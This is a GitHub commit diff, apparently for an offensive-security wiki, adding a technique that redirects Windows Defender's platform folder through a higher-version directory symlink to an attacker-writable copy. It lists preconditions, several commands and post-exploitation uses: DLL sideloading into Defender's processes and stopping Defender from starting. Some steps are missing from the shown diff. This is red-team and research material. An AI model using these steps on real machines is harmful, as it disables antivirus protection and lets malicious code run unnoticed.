You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
It selects the subfolder with the highest lexicographic version string (e.g., `4.18.25070.5-0`), then starts the Defender service processes from there (updating service/registry paths accordingly). This selection trusts directory entries including directory reparse points (symlinks). An administrator can leverage this to redirect Defender to an attacker-writable path and achieve DLL sideloading or service disruption.
901
+
902
+
Preconditions
903
+
- Local Administrator (needed to create directories/symlinks under the Platform folder)
904
+
- Ability to reboot or trigger Defender platform re-selection (service restart on boot)
905
+
- Only built-in tools required (mklink)
906
+
907
+
Why it works
908
+
- Defender blocks writes in its own folders, but its platform selection trusts directory entries and picks the lexicographically highest version without validating that the target resolves to a protected/trusted path.
909
+
910
+
Step-by-step (example)
911
+
1) Prepare a writable clone of the current platform folder, e.g. `C:\TMP\AV`:
912
+
```cmd
913
+
set SRC="C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0"
914
+
set DST="C:\TMP\AV"
915
+
robocopy %SRC% %DST% /MIR
916
+
```
917
+
2) Create a higher-version directory symlink inside Platform pointing to your folder:
4) Verify MsMpEng.exe (WinDefend) runs from the redirected path:
926
+
```powershell
927
+
Get-Process MsMpEng | Select-Object Id,Path
928
+
# or
929
+
wmic process where name='MsMpEng.exe' get ProcessId,ExecutablePath
930
+
```
931
+
You should observe the new process path under `C:\TMP\AV\` and the service configuration/registry reflecting that location.
932
+
933
+
Post-exploitation options
934
+
- DLL sideloading/code execution: Drop/replace DLLs that Defender loads from its application directory to execute code in Defender’s processes. See the section above: [DLL Sideloading & Proxying](#dll-sideloading--proxying).
935
+
- Service kill/denial: Remove the version-symlink so on next start the configured path doesn’t resolve and Defender fails to start:
> Note: This technique does not provide privilege escalation by itself; it requires admin rights.
952
+
895
953
## References
896
954
897
955
-[Unit42 – New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/)
@@ -905,5 +963,7 @@ References for PPL and tooling
905
963
-[Sysinternals – Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon)
-[Zero Salarium – Countering EDRs With The Backing Of Protected Process Light (PPL)](https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html)
966
+
-[Zero Salarium – Break The Protective Shell Of Windows Defender With The Folder Redirect Technique](https://www.zerosalarium.com/2025/09/Break-Protective-Shell-Windows-Defender-Folder-Redirect-Technique-Symlink.html)
0 commit comments